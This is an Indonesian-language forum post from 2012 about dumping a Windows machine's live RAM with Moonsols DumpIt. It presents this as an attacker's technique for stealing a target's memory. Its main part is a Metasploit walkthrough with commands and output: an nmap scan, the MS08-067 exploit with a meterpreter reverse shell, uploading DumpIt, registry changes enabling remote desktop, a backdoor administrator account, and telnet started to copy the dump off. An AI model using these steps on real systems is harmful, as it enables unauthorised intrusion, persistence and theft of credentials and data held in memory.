pernah ada yang bayangin gak? di film film kita sering liat ada geng geng teroris hi tech, menggunakan flashdisk nyolokkin flashdisk di komputer target, lalu dengan cepatnya keluar dari TKP, dan menganalisa “file-entah-apa” yang di dump ke flashdisk tersebut di suatu tempat tersembunyi.
actually gw pernah membayangkan dan mencoba bagaimana sih seperti itu, dan apalagi gw ini bukan teroris seperti itu.
di security cabang spionase atau undercover seperti ini dengan mudah di pelajari dengan mengambil tahap pertama yaitu forensik, karena dengan melakukan forensik kita terbiasa dengan hal detail, lalu kita bisa hitung timing dan keperluan alat alat untuk melakukan forensik.
pada kali ini kita bahasa forensik Live RAM yang di dump pada satu file RAW, dengan bantuan tools Moonsols DumpIt.
Core Dumping / Memory Dumping / Storage Dumping adalah tekhnik untuk debugging sistem operasi secara offline, tanpa mengganggu kinerja sistem yang sedang berjalan, tipe dumping bisa bermacam macam, ada yang crash dumping, storage dumping dll.
So ini menjadi salah satu teknik forensik, di bidang security, dimana jika seseorang attacker ingin menganalisa sistem operasi target namun tidak mempunyai waktu yang cukup, maka core dumping biasa dilakukan untuk menganalisa sistem operasi yang sedang berjalan pada target di tempat lain.
Moonsols DumpIt
This utility is used to generate a physical memory dump of Windows machines. It works with both x86 (32-bits) and x64 (64-bits) machines.
The raw memory dump is generated in the current directory, only a confirmation question is prompted before starting.
Perfect to deploy the executable on USB keys, for quick incident responses needs.
seperti yang ditulis msuiche pada blog moonsols, DumpIt di release karena banyaknya yang melakukan forensik pada memory windows terbatas pada tools yang tersedia di publik, beda nya executable setiap arsitektur processor, serta tidak ada yang praktis.
[You must be registered and logged in to see this image.]DumpIt hanya satu file aplikasi executable, tanpa .ini atau file pendukung lainya, penggunaan nya hanya 1 click lalu hanya ada satu konfirmasi, yaitu yes (y) atau tidak (n).
[You must be registered and logged in to see this image.]begitu yes maka DumpIt akan melakukan dumping live RAM Memory ke dalam satu file, dalam direktori DumpIt.exe itu sendiri, sehingga DumpIt sangat cocok untuk ditaruh ke dalam USB Flashdisk Kosong.
besar file yang di dump adalah besar dari exact memory size, dimana jika RAM target sebesar 4GB, maka DumpIt akan membuat file dumping sebesar 4GB.
ada dua skenario attack pada kasus dumping memory untuk forensik, ialah :
Attacker membawa DumpIt ke satu flashdisk kosong, lalu bertemu dengan target, meminjam komputer windows tersebut, lalu mendumping live RAM Memory si target, Attacker mendapatkan file RAW dari Live RAM memori target lalu menganalisa nya di rumah.
Attacker melakukan penetrasi dari local network dengan metasploit, dengan cara cara :
# Enumeration
01
msf > ping -c 1 192.168.1.106
02
[*] exec: ping -c 1 192.168.1.106
03
04
PING 192.168.1.106 (192.168.1.106) 56(84) bytes of data.
05
64 bytes from 192.168.1.106: icmp_seq=1 ttl=128 time=114 ms
06
07
msf > nmap -p 445 192.168.1.106
08
[*] exec: nmap -p 445 192.168.1.106
09
10
Starting Nmap 5.61TEST4 (
[You must be registered and logged in to see this link.] ) at 2012-02-06 11:09 WIT
11
Nmap scan report for 192.168.1.106
12
Host is up (0.00098s latency).
13
PORT STATE SERVICE
14
445/tcp open microsoft-ds
15
MAC Address: 08:00:27:15:05:2E (Cadmus Computer Systems)
16
17
Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
# Penetration
01
msf > use exploit/windows/smb/ms08_067_netapi
02
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
03
PAYLOAD => windows/meterpreter/reverse_tcp
04
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.106
05
RHOST => 192.168.1.106
06
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.109
07
LHOST => 192.168.1.109
08
msf exploit(ms08_067_netapi) > exploit -f
09
10
[*] Started reverse handler on 192.168.1.109:4444
11
[*] Automatically detecting the target...
12
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
13
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
14
[*] Attempting to trigger the vulnerability...
15
[*] Sending stage (752128 bytes) to 192.168.1.106
16
[*] Meterpreter session 1 opened (192.168.1.109:4444 -> 192.168.1.106:1033) at 2012-02-06 08:26:21 +0700
# Upload DumpIt.exe
1
meterpreter > upload /root/gw/gear0wn/DumpIt/DumpIt.exe C:\
# Preparing service backdoor
1
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
2
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
# Set registry new value
1
meterpreter > reg setval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v AllowTSConnections -t REG_DWORD -d 1
2
meterpreter > reg setval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v fDenyTSConnections -t REG_DWORD -d 0
# Check registry value
1
meterpreter > reg queryval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v AllowTSConnections
2
meterpreter > reg queryval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v fDenyTSConnections
# Restart telnet server
01
meterpreter > execute -f cmd.exe -i
02
Process 4004 created.
03
Channel 2 created.
04
Microsoft Windows XP [Version 5.1.2600]
05
(C) Copyright 1985-2001 Microsoft Corp.
06
07
C:\WINDOWS\system32>net user
08
net user
09
10
User accounts for \\ANONYMOUS
11
12
-------------------------------------------------------------------------------
13
Administrator Guest HelpAssistant
14
idiot SUPPORT_388945a0
15
The command completed successfully.
16
17
C:\WINDOWS\system32>
18
19
C:\Windows\system32\>tlntsvr.exe start
20
C:\Windows\system32\>net user gxrg let_us_in /add
21
C:\Windows\system32\>net localgroup Administrators gxrg /add
22
C:\Windows\system32\>sc config TermService start= auto
23
C:\Windows\system32\>net start Termservice
24
C:\Windows\system32\>sc config tlntsvr start= auto
25
C:\Windows\system32\>net start tlntsvr
Running Telnet ke mesin target, login sesuai user yang telah baru dibuat, lalu jalankan DumpIt, dan pencet y, lalu enter, tunggu beberapa saat, file raw akan dibuat, dan copy ke mesin attacker RAW tersebut, lalu delete user yang telah dibuat, dan logout meterpreter dengan smoothly :).
*dibutuhkan Telnet Server karena, NC dan default shell windows pada meterpreter suck tidak bisa menjalankan DumpIt, dikarenakan interface kedua tools tsb.
Artikel lanjutan dari ini akan ditulis, yaitu analisa forensik RAW Memory dari hasil Dumping.
Good Luck! ;p.
Subyek: Membuat Live RAW Image Random Access Memory (RAM) Pada Mesin Target Windows 
Sun Feb 26, 2012 1:22 am
